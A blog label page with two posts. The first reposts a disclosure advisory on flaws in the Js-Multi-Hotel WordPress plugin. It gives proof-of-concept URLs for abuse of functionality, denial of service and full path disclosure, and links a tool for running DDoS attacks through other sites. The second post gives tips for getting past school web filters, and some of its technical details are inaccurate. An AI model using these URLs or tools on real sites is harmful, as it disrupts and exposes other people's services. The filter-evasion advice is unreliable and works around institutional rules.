Slide 1 Slide 2 Slide 3 Slide 4 Slide 5
Showing posts with label cmd. Show all posts
By Unknown | 0 comment

There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress.
Earlier I wrote about two other vulnerabilities

     

These are Abuse of Functionality, Denial of Service, Cross-Site Scripting
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for
WordPress. There are much more vulnerabilities in this plugin (including
dangerous holes), so after two advisories I'll write new advisories.


Affected products:


Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

Affected vendors:


Joomlaskin
http://www.joomlaskin.it

Details:


Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1

DoS (WASC-10):



http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1


Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).


DDoS attacks via other sites execution tool:
http://websecurity.com.ua/davoset/


Cross-Site Scripting (WASC-08):

                        other : [ added by khalil shreateh ]

                        Full path disclosure (WASC-13):



http://site/wp-content/plugins/js-multihotel/includes/functions.php

http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php

http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=

http://site/wp-content/plugins/js-multihotel/includes/show_image.php

http://site/wp-content/plugins/js-multihotel/includes/widget.php

http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php

http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
Read more...
By Unknown | 0 comment

Nowadays many schools and colleges have blocked the social community sites from accessing them through school computers. The video shows how one can access to these sites using a command prompt.

Follow these steps and access the blocked sites:


1. Go to the start menu and open the command prompt.
2. Type the command ping and then type the website you want to use. Don't add http:// or www. in front of the site For example: Facebook.com
3. After typing the website hit the enter.
4. Once you hit enter button the IP address no: will appear in the form of xxxx.xx.xxx.xxxx
5. Type those no: in the address bar of Internet Explorer and hit enter.
6. Here you go the full Facebook website is available on your screen.

Beside this, there are many other ways are their to access these blocked sites. One may use proxy servers to use this sites there are many proxy servers available such as http://www.vtunnel.com and http://www.kproxy.com

You may use Google cache option also in order to access this using Google search.

Read more...